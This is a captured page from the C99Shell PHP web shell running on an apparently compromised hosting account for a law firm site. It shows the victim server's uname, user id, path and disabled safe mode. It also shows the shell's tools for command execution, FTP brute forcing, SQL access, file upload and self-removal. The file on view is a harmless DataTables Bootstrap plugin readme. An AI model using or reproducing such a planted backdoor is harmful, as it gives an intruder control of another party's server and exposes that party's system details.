!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/mophlawyer.com/admin/assets/vendor/jquery-datatables-bs3/   drwxr-xr-x
Free 237.56 GB of 981.82 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.html (3.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Datatables

Bootstrap3 plugin for datatable

This plugin adds tweaks for datatable UI to render correctly.

Files & Code
<link rel="stylesheet" href="css/datatables.css">
<script src="js/datatables.js"></script>

// Html code
<table class="datatable table table-striped table-bordered">
</table>

// Javascript code
$('.datatable').dataTable();
$('.datatable').each(function(){
    var datatable = $(this);
    var search_input = datatable.closest('.dataTables_wrapper').find('div[id$=_filter] input');
    search_input.attr('placeholder', 'Search');
    search_input.addClass('form-control input-sm');
    var length_sel = datatable.closest('.dataTables_wrapper').find('div[id$=_length] select');
    length_sel.addClass('form-control input-sm');
});
Pagination types
$('.datatable').dataTable({
"sPaginationType": "bs_normal"
});

View Default »

$('.datatable').dataTable({
"sPaginationType": "bs_two_button"
});

View Two buttons »

$('.datatable').dataTable({
"sPaginationType": "bs_four_button"
});

View Four buttons »

$('.datatable').dataTable({
"sPaginationType": "bs_full"
});

View Complete »


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0102 ]--